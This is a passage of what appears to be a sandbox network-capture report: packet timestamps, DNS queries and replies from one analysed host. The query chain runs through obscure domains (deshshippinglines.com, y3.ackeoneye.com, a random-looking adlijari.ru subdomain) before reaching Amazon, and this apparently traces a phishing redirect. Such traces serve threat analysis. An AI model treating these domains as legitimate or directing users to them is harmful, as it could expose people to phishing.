                                                                                                                                  Jan 27, 2025 15:46:02.245239019 CET4435005599.86.8.42192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.250227928 CET4435006218.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.264251947 CET50062443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:02.264272928 CET4435006218.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.264687061 CET4435006218.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.304488897 CET50062443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:02.384289980 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.396152973 CET50064443192.168.2.5108.138.16.195
                                                                                                                                  Jan 27, 2025 15:46:02.396193027 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.396384001 CET50062443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:02.396672010 CET4435006218.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.396800041 CET50062443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:02.396825075 CET50062443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:02.396847963 CET4435006218.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.399075985 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.399173021 CET50064443192.168.2.5108.138.16.195
                                                                                                                                  Jan 27, 2025 15:46:02.402658939 CET50064443192.168.2.5108.138.16.195
                                                                                                                                  Jan 27, 2025 15:46:02.402833939 CET50064443192.168.2.5108.138.16.195
                                                                                                                                  Jan 27, 2025 15:46:02.402839899 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.416615009 CET4435006399.86.8.42192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.416858912 CET50063443192.168.2.599.86.8.42
                                                                                                                                  Jan 27, 2025 15:46:02.416883945 CET4435006399.86.8.42192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.417370081 CET4435006399.86.8.42192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.417670965 CET50063443192.168.2.599.86.8.42
                                                                                                                                  Jan 27, 2025 15:46:02.417745113 CET4435006399.86.8.42192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.443337917 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.443819046 CET50064443192.168.2.5108.138.16.195
                                                                                                                                  Jan 27, 2025 15:46:02.443841934 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.451474905 CET50065443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:02.451510906 CET4435006518.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.451589108 CET50065443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:02.451805115 CET50065443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:02.451819897 CET4435006518.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.460097075 CET50063443192.168.2.599.86.8.42
                                                                                                                                  Jan 27, 2025 15:46:02.499206066 CET50064443192.168.2.5108.138.16.195
                                                                                                                                  Jan 27, 2025 15:46:02.511288881 CET4435006218.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.511660099 CET4435006218.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.511687040 CET50062443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:02.511706114 CET4435006218.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.511718988 CET50062443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:02.511754036 CET50062443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:02.664881945 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.666449070 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.666457891 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.666523933 CET50064443192.168.2.5108.138.16.195
                                                                                                                                  Jan 27, 2025 15:46:02.666547060 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.666718006 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.666769981 CET50064443192.168.2.5108.138.16.195
                                                                                                                                  Jan 27, 2025 15:46:02.667485952 CET50064443192.168.2.5108.138.16.195
                                                                                                                                  Jan 27, 2025 15:46:02.667503119 CET44350064108.138.16.195192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.667512894 CET50064443192.168.2.5108.138.16.195
                                                                                                                                  Jan 27, 2025 15:46:02.667551994 CET50064443192.168.2.5108.138.16.195
                                                                                                                                  Jan 27, 2025 15:46:02.672322989 CET50066443192.168.2.518.66.143.128
                                                                                                                                  Jan 27, 2025 15:46:02.672363043 CET4435006618.66.143.128192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:02.672420025 CET50066443192.168.2.518.66.143.128
                                                                                                                                  Jan 27, 2025 15:46:02.672780037 CET50066443192.168.2.518.66.143.128
                                                                                                                                  Jan 27, 2025 15:46:02.672792912 CET4435006618.66.143.128192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.037892103 CET4435006518.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.038186073 CET50065443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.038203001 CET4435006518.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.038511992 CET4435006518.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.038949966 CET50065443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.038949966 CET50065443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.038965940 CET4435006518.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.039005995 CET4435006518.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.094297886 CET50065443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.143172026 CET4435006518.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.143249035 CET4435006518.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.143296003 CET50065443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.144027948 CET50065443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.144043922 CET4435006518.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.149729013 CET50067443192.168.2.554.88.216.125
                                                                                                                                  Jan 27, 2025 15:46:03.149766922 CET4435006754.88.216.125192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.149849892 CET50067443192.168.2.554.88.216.125
                                                                                                                                  Jan 27, 2025 15:46:03.150243044 CET50067443192.168.2.554.88.216.125
                                                                                                                                  Jan 27, 2025 15:46:03.150259972 CET4435006754.88.216.125192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.399163961 CET4435006618.66.143.128192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.399533987 CET50066443192.168.2.518.66.143.128
                                                                                                                                  Jan 27, 2025 15:46:03.399575949 CET4435006618.66.143.128192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.399952888 CET4435006618.66.143.128192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.400288105 CET50066443192.168.2.518.66.143.128
                                                                                                                                  Jan 27, 2025 15:46:03.400351048 CET4435006618.66.143.128192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.400433064 CET50066443192.168.2.518.66.143.128
                                                                                                                                  Jan 27, 2025 15:46:03.426198959 CET50068443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.426229000 CET4435006818.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.426320076 CET50068443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.427094936 CET50068443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.427104950 CET4435006818.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.447324038 CET4435006618.66.143.128192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.621272087 CET4435006754.88.216.125192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.621669054 CET50067443192.168.2.554.88.216.125
                                                                                                                                  Jan 27, 2025 15:46:03.621690989 CET4435006754.88.216.125192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.622024059 CET4435006754.88.216.125192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.622436047 CET50067443192.168.2.554.88.216.125
                                                                                                                                  Jan 27, 2025 15:46:03.622490883 CET4435006754.88.216.125192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.622613907 CET50067443192.168.2.554.88.216.125
                                                                                                                                  Jan 27, 2025 15:46:03.667320013 CET4435006754.88.216.125192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.678113937 CET4435006618.66.143.128192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.678294897 CET4435006618.66.143.128192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.678383112 CET50066443192.168.2.518.66.143.128
                                                                                                                                  Jan 27, 2025 15:46:03.678438902 CET4435006618.66.143.128192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.679861069 CET50066443192.168.2.518.66.143.128
                                                                                                                                  Jan 27, 2025 15:46:03.679910898 CET4435006618.66.143.128192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.679970026 CET50066443192.168.2.518.66.143.128
                                                                                                                                  Jan 27, 2025 15:46:03.730551004 CET4435006754.88.216.125192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.730628014 CET4435006754.88.216.125192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.730686903 CET50067443192.168.2.554.88.216.125
                                                                                                                                  Jan 27, 2025 15:46:03.731508970 CET50067443192.168.2.554.88.216.125
                                                                                                                                  Jan 27, 2025 15:46:03.731523991 CET4435006754.88.216.125192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.903503895 CET4435006818.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.904022932 CET50068443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.904043913 CET4435006818.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.905155897 CET4435006818.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.905693054 CET50068443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.905857086 CET4435006818.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.905888081 CET50068443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.905981064 CET50068443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.906065941 CET4435006818.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:03.906135082 CET50068443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:03.906141996 CET4435006818.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:04.107572079 CET4435006818.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:04.107656956 CET4435006818.204.152.18192.168.2.5
                                                                                                                                  Jan 27, 2025 15:46:04.107722998 CET50068443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:04.108169079 CET50068443192.168.2.518.204.152.18
                                                                                                                                  Jan 27, 2025 15:46:04.108189106 CET4435006818.204.152.18192.168.2.5
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Jan 27, 2025 15:44:46.219018936 CET53511151.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:46.240314960 CET53581581.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:47.239921093 CET53587431.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:50.754228115 CET4946553192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:50.754406929 CET5701853192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:50.761164904 CET53570181.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:50.761501074 CET53494651.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:52.355405092 CET5341753192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:52.355544090 CET6220653192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:52.363224983 CET53534171.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:52.364947081 CET53622061.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:53.647018909 CET6523353192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:53.647218943 CET5179253192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:53.656331062 CET53652331.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:53.657408953 CET53517921.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:54.652602911 CET5400553192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:54.652888060 CET6109753192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:54.665746927 CET53610971.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:54.666827917 CET53540051.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:56.662925005 CET5580053192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:56.663074970 CET5717653192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:56.663458109 CET5540353192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:56.663598061 CET5251053192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:56.663958073 CET5596153192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:56.664069891 CET5328153192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:56.674592018 CET53558001.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:56.675033092 CET53571761.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:56.675384998 CET53525101.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:56.675415039 CET53554031.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:56.675442934 CET53559611.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:56.675587893 CET53532811.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:57.392365932 CET6294853192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:57.392597914 CET5259453192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:57.401218891 CET53525941.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:57.401431084 CET53629481.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:57.440129042 CET5929853192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:57.440294981 CET6333653192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:57.449001074 CET53592981.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:57.450556040 CET53633361.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:58.153728008 CET4924453192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:58.153947115 CET5372353192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:58.161046028 CET53537231.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:58.161180019 CET53492441.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:58.291023016 CET4975253192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:58.291179895 CET6022053192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:44:58.297892094 CET53497521.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:44:58.298046112 CET53602201.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:04.290414095 CET53524611.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:09.690315008 CET6368953192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:09.690502882 CET6335453192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:09.703608036 CET53633541.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:09.867923975 CET53636891.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:11.443795919 CET5002153192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:11.444087029 CET5180753192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:11.450412035 CET53500211.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:11.451467037 CET53518071.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:11.481039047 CET5227153192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:11.481172085 CET5393553192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:11.491684914 CET53539351.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:11.493495941 CET53522711.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:12.614361048 CET5560053192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:12.614701986 CET5130253192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:12.621118069 CET53556001.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:12.621907949 CET53513021.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:13.682226896 CET6401453192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:13.682667971 CET5481153192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:13.688834906 CET53640141.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:13.689766884 CET53548111.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:13.972023010 CET6216153192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:13.972167969 CET5172753192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:13.982285976 CET53621611.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:13.982302904 CET53517271.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:14.022005081 CET53581471.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:14.681339025 CET6093053192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:14.681802034 CET5499753192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:14.689100981 CET53609301.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:14.689210892 CET53549971.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:17.445338011 CET5191653192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:17.445529938 CET6411353192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:17.455564976 CET53641131.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:17.458669901 CET53519161.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:23.289349079 CET53615031.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:46.049982071 CET53632381.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:46.121819019 CET53576731.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:50.813088894 CET6011253192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:50.813148975 CET6027053192.168.2.51.1.1.1
                                                                                                                                  Jan 27, 2025 15:45:50.820003033 CET53601121.1.1.1192.168.2.5
                                                                                                                                  Jan 27, 2025 15:45:50.820044994 CET53602701.1.1.1192.168.2.5
                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Jan 27, 2025 15:44:50.754228115 CET192.168.2.51.1.1.10x600fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:50.754406929 CET192.168.2.51.1.1.10x15c0Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:52.355405092 CET192.168.2.51.1.1.10xc6bcStandard query (0)www.google.pnA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:52.355544090 CET192.168.2.51.1.1.10x5fa3Standard query (0)www.google.pn65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:53.647018909 CET192.168.2.51.1.1.10x3c41Standard query (0)deshshippinglines.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:53.647218943 CET192.168.2.51.1.1.10x8e8bStandard query (0)deshshippinglines.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:54.652602911 CET192.168.2.51.1.1.10xa727Standard query (0)y3.ackeoneye.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:54.652888060 CET192.168.2.51.1.1.10x7ac6Standard query (0)y3.ackeoneye.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.662925005 CET192.168.2.51.1.1.10xdff8Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.663074970 CET192.168.2.51.1.1.10xb059Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.663458109 CET192.168.2.51.1.1.10x23e3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.663598061 CET192.168.2.51.1.1.10xcffeStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.663958073 CET192.168.2.51.1.1.10x7297Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.664069891 CET192.168.2.51.1.1.10x5e21Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:57.392365932 CET192.168.2.51.1.1.10x6eadStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:57.392597914 CET192.168.2.51.1.1.10x1ba3Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:57.440129042 CET192.168.2.51.1.1.10x8602Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:57.440294981 CET192.168.2.51.1.1.10x8278Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:58.153728008 CET192.168.2.51.1.1.10xfbddStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:58.153947115 CET192.168.2.51.1.1.10x9e8aStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:58.291023016 CET192.168.2.51.1.1.10x5ff1Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:58.291179895 CET192.168.2.51.1.1.10x58bbStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:09.690315008 CET192.168.2.51.1.1.10xd939Standard query (0)v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ruA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:09.690502882 CET192.168.2.51.1.1.10xb1acStandard query (0)v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.443795919 CET192.168.2.51.1.1.10x81f9Standard query (0)www.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.444087029 CET192.168.2.51.1.1.10x9f03Standard query (0)www.amazon.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.481039047 CET192.168.2.51.1.1.10x1c33Standard query (0)v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ruA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.481172085 CET192.168.2.51.1.1.10x6235Standard query (0)v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:12.614361048 CET192.168.2.51.1.1.10x85d1Standard query (0)images-na.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:12.614701986 CET192.168.2.51.1.1.10x29edStandard query (0)images-na.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.682226896 CET192.168.2.51.1.1.10x6986Standard query (0)images-na.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.682667971 CET192.168.2.51.1.1.10xa0eStandard query (0)images-na.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.972023010 CET192.168.2.51.1.1.10x962fStandard query (0)fls-na.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.972167969 CET192.168.2.51.1.1.10xf717Standard query (0)fls-na.amazon.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.681339025 CET192.168.2.51.1.1.10x35a3Standard query (0)fls-na.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.681802034 CET192.168.2.51.1.1.10xcfbeStandard query (0)fls-na.amazon.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:17.445338011 CET192.168.2.51.1.1.10x2a12Standard query (0)www.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:17.445529938 CET192.168.2.51.1.1.10x25f7Standard query (0)www.amazon.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:50.813088894 CET192.168.2.51.1.1.10x2cedStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:50.813148975 CET192.168.2.51.1.1.10xe293Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Jan 27, 2025 15:44:50.761164904 CET1.1.1.1192.168.2.50x15c0No error (0)www.google.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:50.761501074 CET1.1.1.1192.168.2.50x600fNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:52.363224983 CET1.1.1.1192.168.2.50xc6bcNo error (0)www.google.pn216.58.212.131A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:53.656331062 CET1.1.1.1192.168.2.50x3c41No error (0)deshshippinglines.com199.168.185.232A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:54.665746927 CET1.1.1.1192.168.2.50x7ac6No error (0)y3.ackeoneye.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:54.666827917 CET1.1.1.1192.168.2.50xa727No error (0)y3.ackeoneye.com104.21.93.228A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:54.666827917 CET1.1.1.1192.168.2.50xa727No error (0)y3.ackeoneye.com172.67.216.84A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.674592018 CET1.1.1.1192.168.2.50xdff8No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.674592018 CET1.1.1.1192.168.2.50xdff8No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.674592018 CET1.1.1.1192.168.2.50xdff8No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.674592018 CET1.1.1.1192.168.2.50xdff8No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.675384998 CET1.1.1.1192.168.2.50xcffeNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.675415039 CET1.1.1.1192.168.2.50x23e3No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.675415039 CET1.1.1.1192.168.2.50x23e3No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.675442934 CET1.1.1.1192.168.2.50x7297No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
